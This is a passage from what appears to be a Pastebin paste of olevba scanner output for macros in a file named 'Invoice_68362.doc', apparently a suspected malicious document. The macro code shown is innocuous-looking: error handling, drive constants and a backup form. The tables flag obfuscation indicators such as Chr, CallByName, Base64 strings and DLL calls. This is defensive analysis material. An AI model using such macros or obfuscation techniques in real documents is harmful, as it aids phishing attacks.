  905.        Case 11
  906.             Resume GetDivisorOnly
  907.         '
  908.        ' Overflow
  909.        '
  910.        Case 6
  911.             Resume GetDividendAndDivisor
  912.         '
  913.        ' Type mismatch
  914.        '
  915.        Case 13
  916.             If Not IsNumeric(dividend) Then
  917.                 Resume GetDividendAndDivisor
  918.             Else
  919.                 Resume GetDivisorOnly
  920.             End If
  921.         '
  922.        ' Anything else, just quit
  923.        '
  924.        Case Else
  925.             Exit Sub
  926.     End Select
  927. End Sub
  928.  
  929. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  930. ANALYSIS:
  931. +------------+----------------+-----------------------------------------+
  932. | Type       | Keyword        | Description                             |
  933. +------------+----------------+-----------------------------------------+
  934. | Suspicious | Chr            | May attempt to obfuscate specific       |
  935. |            |                | strings                                 |
  936. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  937. |            |                | function calls                          |
  938. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  939. |            |                | may be used to obfuscate strings        |
  940. |            |                | (option --decode to see all)            |
  941. +------------+----------------+-----------------------------------------+
  942. -------------------------------------------------------------------------------
  943. VBA MACRO Module4.bas
  944. in file: Invoice_68362.doc - OLE stream: u'Macros/VBA/Module4'
  945. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  946. 'Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
  947. 'Declare Function GetDiskFreeSpace Lib "kernel32" Alias "GetDiskFreeSpaceA" (ByVal lpRootPathName As String, lpSectorsPerCluster As Long, lpBytesPerSector As Long, lpNumberOfFreeClusters As Long, lpTotalNumberOfClusters As Long) As Long
  948. '
  949. ' Constants used with GetDriveType result
  950. '
  951. Public Const DRIVE_REMOVABLE = 2
  952. Public Const DRIVE_FIXED = 3
  953. Public Const DRIVE_REMOTE = 4
  954. Public Const DRIVE_CDROM = 5
  955. Public Const DRIVE_RAMDISK = 6
  956. '
  957. ' This Type is used to hold properties of the open documents
  958. '
  959. Type BackupDoc
  960.     Name As String
  961.     Path As String
  962.     State As String
  963.     Size As Long
  964.     Selected As Boolean
  965. End Type
  966. '
  967. ' Use this procedure to display the Backup form
  968. '
  969. Sub ShowBackup()
  970.     '
  971.    ' Ignore the error that occurs if this procedure is
  972.    ' executed while the form is already displayed.
  973.    '
  974.    On Error Resume Next
  975.     frmBackup.Show
  976.     Set frmBackup = Nothing
  977. End Sub
  978. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  979. ANALYSIS:
  980. +------------+----------------+-----------------------------------------+
  981. | Type       | Keyword        | Description                             |
  982. +------------+----------------+-----------------------------------------+
  983. | Suspicious | Open           | May open a file                         |
  984. | Suspicious | Lib            | May run code from a DLL                 |
  985. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  986. |            |                | may be used to obfuscate strings        |
  987. |            |                | (option --decode to see all)            |
  988. +------------+----------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top